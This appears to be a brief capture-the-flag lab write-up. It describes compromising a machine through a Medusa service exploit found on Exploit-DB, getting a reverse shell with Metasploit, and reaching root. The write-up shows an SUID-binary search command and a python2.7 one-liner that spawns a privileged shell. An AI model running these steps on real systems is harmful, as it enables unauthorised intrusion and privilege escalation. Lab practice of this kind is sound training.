Super Process Machine

Start with scan IP of machine

after search for medusa service we found CVE https://www.exploit-db.com/exploits/42779 which we can use Metasploit to exploit this service

we success to take a reverse shell on this machine

now let’s make a privilege escalation which we started to search on process have SUID

find / -perm -u=s -type f 2>/dev/null

now let’s search on python 2.7 exploit

/usr/bin/python2.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Last updated 2 months ago